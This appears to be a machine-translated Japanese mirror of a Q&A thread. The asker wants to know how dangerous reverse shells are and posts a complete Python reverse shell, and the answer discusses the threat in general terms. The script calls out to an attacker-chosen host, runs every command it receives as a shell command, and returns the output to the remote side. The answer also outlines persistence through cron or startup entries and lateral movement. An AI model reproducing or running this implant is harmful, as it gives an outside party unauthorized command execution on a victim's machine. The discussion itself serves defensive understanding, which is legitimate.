web-dev-qa-db-ja.com

ネットワークに対するリバースシェルはどれほど危険ですか?

私はPythonで単純な逆シェルに取り組んでいます。犠牲者にスポーンされたシェルのコマンドを受け入れて解釈することができます。残念ながら、私が十分に理解していない理由から、ping、traceroute、nbtstat(Windowsマシンの場合)、nslookup(Windowsの場合も)などの機能はサポートされていません。私の質問は、これらのリバースシェルがネットワークに対してどの程度の脅威であるかということです。標準ユーザーが特権を制限する(そして制限する必要がある)という意味では些細なことのように見えるので、実際に害を及ぼすことはできません。逆シェルは、仲間の家に行って彼のコンピューターに接続するようなもののようです。コンセプトの証明。また、さらに読むためのリンクをいただければ幸いです。 「裏返し」の攻撃は本当に私に興味を持っています。 Thingy:ああ、すみません、「もの」を含めるのを忘れました:)

#! /usr/bin/python3

import socket, subprocess, os
from sys import argv

script, Host, port = argv


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((str(Host), int(port)))
except ValueError as err:
    print ("You entered the wrong Host / port combination or something...")
    print ("Here is the error message:\n{}".format(err))
except (socket.error) as err:
    print ("Socket error of some sort...")
    print ("Here is the error message:\n\n\n{}".format(err))


while True:
    s.send("Command: ".encode("utf-8"))
    comm = s.recv(4096)
    comm = comm.decode("utf-8")
    print (comm)
    if comm[:2] == "cd":
        os.chdir(comm[3:].rstrip())
    p = subprocess.Popen([comm], Shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding = 'utf-8')
    s.send(p.stdout.read().encode("utf-8"))
1
Inquisitive

理想的な世界では、コンピュータに脆弱性があるべきではありませんよね?残念ながら、私たちはそのような夢の世界に住んでおらず、脆弱性が悪用されると、ペイロードはしばしばある種のシェルになります。

最も制限の厳しいネットワークでも、DNSクエリの送信と応答の受信が許可されることがよくあります ;これは、リバースシェルをホストするには十分ですが、フォワードシェルをホストするには不十分です。

時々それは時間の問題です。特権昇格の脆弱性、ローカルバッファオーバーフローなどの制限から抜け出した結果として、多くの厄介な驚きがありました。適切なタイミングでシステム上で特権不足のユーザーとしてシェルを実行している場合、それはあなたのドアに足を踏み入れます。恵まれないアクセスは、患者の「ハッカー」にとって良いことです。彼/彼女は脆弱性が来るのを待つだけの時間を入札することができます...

...そして、管理アクセスが取得されたときにシステムへのアクセスを維持するためのより良いツールは何ですか?システムサービス、crontab、または他の多くの場所として、スタートアップレジストリに追加する必要があります...

それはさておき、すべての脆弱性がルートアクセスをもたらす必要があるわけではありません。いくつかの静止画像を提供するCプログラムを書いたときのことを思い出します。今、あなたはそのようなプログラムがバッファオーバーフローを含むべきではないと思うでしょう、そして私はかなり自信がありました、しかしそれはそうしました。それはしました、そしてそれは悪用されました。システムの他の部分から分離されている可能性がありますが、それでも「ハッカー」がnmapを実行してシステム上のサブレンジをスキャンするのを止めることはできませんでした。

おそらく、ネットワーク上にネットワーク対応のプリンタがあったり、脆弱なルーターがあったりすると、特権のないアカウントを使用できた可能性があります 他のシステムにアクセスするため !その時点で、このようなハッカーは時間をかけ、内部ネットワーク全体の将来の脆弱性をテストし、管理アクセスを待つ可能性があります傍受されたトラフィックとドキュメントが儲かっていない場合十分.。

これはまた、IRCが感染性の汚物の嫌な泥沼だった時代を思い出させます。スパムは一部のユーザーが入力するコマンドの形式であり、その後、彼らのシステムはさらなるスパムに使用されますもちろん、これは多くの侵害されたマシンの運命であることは間違いありません。迷惑な大量の電子メールを偽造することは管理ツールを必要とせず、金銭的なインセンティブを提供する可能性があるからです。

私たちが金銭的インセンティブのトピックに取り組んでいる間、あなたはフォローしていますか イーサの価格

1
autistic